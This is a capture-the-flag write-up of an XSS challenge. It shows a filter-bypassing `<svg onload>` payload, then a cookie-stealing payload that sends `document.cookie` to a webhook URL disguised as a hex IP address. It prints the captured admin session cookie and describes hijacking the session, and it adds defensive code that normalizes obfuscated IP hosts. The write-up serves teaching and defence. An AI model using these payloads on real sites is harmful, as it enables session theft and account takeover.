Tags: cookie xss 

Rating: 5.0

This is an XSS challenge. Sign up and try to send yourself an XSS message:


There is a filter in place, so let's get around it. Let's try this payload: `<svg onload=alert("xss")//`

Sweet, let's read our messages to see if we successfully XSS ourselves:

Success!

Now we need to craft a payload that steals the admin user's session cookie while bypassing the filters in place. To receive the callback, I used https://webhook.site/ and got the following unique URL: `http://webhook.site/6db432a0-7984-4146-9fbc-d6278b9f865f`. The address contains a single period, which will not get past the filter. To get around this, I ran `ping webhook.site` to get the IP address (46.4.105.116). From there, we can [convert that IP address to hex](https://onlinehextools.com/convert-ip-to-hex), which gives `0x2e046974`. If you browse to http://0x2e046974, it resolves to the correct IP address and host, which is neat. Our unique URL is now: http://0x2e046974/6db432a0-7984-4146-9fbc-d6278b9f865f.
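The hex-literal trick works because a period blocklist never sees the real destination. As an added example (not part of the original writeup), here is a defender-side normalizer that maps hex, decimal, octal and mixed IPv4 literals back to dotted-quad form, so a URL filter or log-review rule can flag the obfuscated host; `inspect_url` and `normalize_numeric_host` are names chosen for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit


def _parse_part(part: str) -> int:
    """Parse one inet_aton-style component: 0x.. hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part[2:], 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    raise ValueError(f"not a numeric host component: {part!r}")


def normalize_numeric_host(host: str) -> str:
    """Map any classic IPv4 literal (1-4 components, last one fills the rest) to dotted quad."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"bad component count: {host!r}")
    values = [_parse_part(p) for p in parts]
    leading, last = values[:-1], values[-1]
    if any(v > 0xFF for v in leading):
        raise ValueError(f"component out of range: {host!r}")
    tail_bytes = 4 - len(leading)           # bytes covered by the last component
    if last >= 256 ** tail_bytes:
        raise ValueError(f"last component out of range: {host!r}")
    n = 0
    for v in leading:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | last
    return str(ipaddress.IPv4Address(n))


def inspect_url(url: str):
    """Return (canonical_ip, obfuscated); canonical_ip is None for non-numeric hosts."""
    host = urlsplit(url).hostname or ""
    try:
        canonical = normalize_numeric_host(host)
    except ValueError:
        return None, False
    return canonical, canonical != host


if __name__ == "__main__":
    # Constructed sample: the exfiltration URL shape used in the writeup above.
    print(inspect_url("http://0x2e046974/6db432a0-7984-4146-9fbc-d6278b9f865f/?c="))
    # -> ('46.4.105.116', True)
```

Character blocklists like the one bypassed here are not a reliable control; marking the session cookie `HttpOnly` would also have kept `document.cookie` from exposing it to the payload.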

Here is the XSS payload: `<svg onload=document['location']="http://0x2e046974/6db432a0-7984-4146-9fbc-d6278b9f865f/?c="+document['cookie']//`

Let's send it to the admin:

Let's check our webhook:

Sweet! We got a session cookie:
`.eJwlzj0OwjAMQOG7ZGaInSaxe5nKvwKJqRET4u4UMb7pfe9y5BnrXvaU54pbOR5e9pIYBGOKVgo3wEmOtnUYDORs0TjRRaJnnyQtBrK4WVpvigltxIyxTQ6pfWMFSZ6eQL9Az6lIlbmrXZcW2kkHeMYwwlDFWi7Ia8X510D5fAFFYzCb.YiWMRg.092EULk8J3n8Q__eqbmFDDocCbY`

Let's set this as our session cookie value:

Reload the page, and voilà!

Click into `admin panel` and we have the flag!

Original writeup (https://github.com/NihilistPenguin/PatriotCTF2022-Writeups/blob/main/Web/ChewyOrCrunchy.md).